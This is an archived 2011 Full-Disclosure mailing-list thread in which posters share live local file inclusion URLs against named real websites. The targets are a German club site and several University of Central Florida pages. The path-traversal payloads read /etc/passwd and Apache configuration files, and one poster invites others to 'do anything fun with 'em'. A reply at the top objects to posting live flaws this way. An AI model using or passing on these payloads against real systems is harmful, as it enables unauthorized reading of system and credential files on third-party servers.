[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: [Full-disclosure] LFI Bug and other
- To: Friedrich Hausberger <fhausberger@xxxxxxxxx>
- Subject: Re: [Full-disclosure] LFI Bug and other
- From: ghost <ghosts@xxxxxxxxx>
- Date: Sat, 19 Feb 2011 19:06:03 -0800
It sure as hell was not meant to be a place where children post links
to sites with live LFI issues.
On Sat, Feb 19, 2011 at 4:58 AM, Friedrich Hausberger
<fhausberger@xxxxxxxxx> wrote:
> Is full disclosure a security mailing list, where I can find hacking
> stuff or a magazine about
> chat show? I hate pornography also, but this is the wrong way to publish.
>
> Here you have a LFI vuln I found by accident:
>
> http://bc-heppenheim.de/download.php?datei=../../../../../etc/passwd.
> Feel free to download the whole Debian 4.0 Distribution.
>
> Most provider do not use jails/chroot or similar for their multi hosted
> webserver. Nearly all providers are hackable under 3 days.
>
> Regards
>
> FHausberger
>
>>
>> Message: 17
>> Date: Sat, 19 Feb 2011 01:08:56 -0500
>> From: Hack Talk<hacktalkblog@xxxxxxxxx>
>> Subject: [Full-disclosure] University of Central Florida Multiple LFI
>> To: full-disclosure@xxxxxxxxxxxxxxxxx
>> Message-ID:
>> <AANLkTi=oyDpNL6Jgu8Ms=btLaZdjUkvyhFxXLH8vDjj0@xxxxxxxxxxxxxx>
>> Content-Type: text/plain; charset="iso-8859-1"
>>
>> Found these and thought I'd share:
>>
>> -==================-
>> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
>> -==================-
>> Let me know if you do anything fun with 'em
>>
>> Luis Santana - Security+
>> Administrator - http://hacktalk.net
>> HackTalk Security - Security From The Underground
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>> URL:
>> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/6916c766/attachment-0001.html
>>
>> ------------------------------
>>
>> Message: 18
>> Date: Sat, 19 Feb 2011 16:34:21 +0530
>> From: Madhur Ahuja<ahuja.madhur@xxxxxxxxx>
>> Subject: Re: [Full-disclosure] University of Central Florida Multiple
>> LFI
>> To: Hack Talk<hacktalkblog@xxxxxxxxx>
>> Cc: full-disclosure@xxxxxxxxxxxxxxxxx
>> Message-ID:
>> <AANLkTimd5F1Kgw1uCO_UGgX3mVUiMuU9jaisp6K=SM-K@xxxxxxxxxxxxxx>
>> Content-Type: text/plain; charset="utf-8"
>>
>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/passwd%00
>>
>> On Sat, Feb 19, 2011 at 11:38 AM, Hack Talk<hacktalkblog@xxxxxxxxx> wrote:
>>
>>> Found these and thought I'd share:
>>>
>>> -==================-
>>>
>>> http://excel.ucf.edu/index.php?p=../../../../../../../../../../../../../../../../../../../../etc/apache2/apache2.conf%00
>>>
>>> http://chemistry.cos.ucf.edu/belfield/index.php?page=../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf%00
>>> -==================-
>>> Let me know if you do anything fun with 'em
>>>
>>> Luis Santana - Security+
>>> Administrator - http://hacktalk.net
>>> HackTalk Security - Security From The Underground
>>>
>>>
>>> _______________________________________________
>>> Full-Disclosure - We believe in it.
>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>
>> -------------- next part --------------
>> An HTML attachment was scrubbed...
>> URL:
>> http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20110219/d0ac46de/attachment.html
>>
>> ------------------------------
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>> End of Full-Disclosure Digest, Vol 72, Issue 44
>> ***********************************************
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/